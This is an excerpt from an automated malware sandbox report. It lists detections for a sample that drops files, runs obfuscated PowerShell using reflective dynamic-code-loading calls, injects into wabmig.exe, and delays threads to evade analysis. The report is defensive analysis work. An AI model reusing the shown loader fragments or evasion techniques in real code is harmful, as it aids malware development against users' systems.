            Source: Yara matchFile source: 00000002.00000002.2217265751.000000000B997000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Eastness $Gaysome $Nonpassible), (Galleins @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Vaadomraader = [AppDomain]::CurrentDomain.GetAssemblies()$global
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($besaettelsestid)), $Gangstiens10).DefineDynamicModule($Bobjerom, $false).DefineType($Dygtiggrelsens, $Zigzaggery, [System.MulticastDel
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04C0AD10 push eax; ret 2_2_04C0ADD9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04C0D23C push eax; ret 2_2_04C0D23D
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_00949C30 push esp; retf 22CAh7_2_00949D55
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_0094891E pushad ; iretd 7_2_0094891F
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_00948C2F pushfd ; iretd 7_2_00948C30
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_00948DDF push esp; iretd 7_2_00948DE0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 7_2_00942D49 push 8BFFFFFFh; retf 7_2_00942D4F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\acneform\Tjenestepligterne\file.exeJump to dropped file
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dllJump to dropped file
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeAPI/Special instruction interceptor: Address: 6E4026E
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: 940000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: 22DE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: 24DE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599780Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599661Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599318Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599203Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598982Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598762Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598648Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598546Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598326Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598216Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597671Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597343Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597234Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597116Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597015Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596905Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596796Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596680Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596557Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596343Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596222Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596094Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595841Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595731Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595622Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595178Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595049Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594797Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594687Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594469Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7141Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2526Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWindow / User API: threadDelayed 3881Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWindow / User API: threadDelayed 5963Jump to behavior
            Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -33204139332677172s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 5652Thread sleep count: 3881 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 5652Thread sleep count: 5963 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -599780s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -599661s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -599546s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -599318s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -599203s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -599093s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598982s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598875s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598762s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598648s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598546s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598437s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598326s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598216s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598109s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -597890s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -597671s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -597562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -597453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -597343s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -597234s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -597116s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -597015s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -596905s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -596796s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -596680s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -596557s >= -30000sJump to behavior
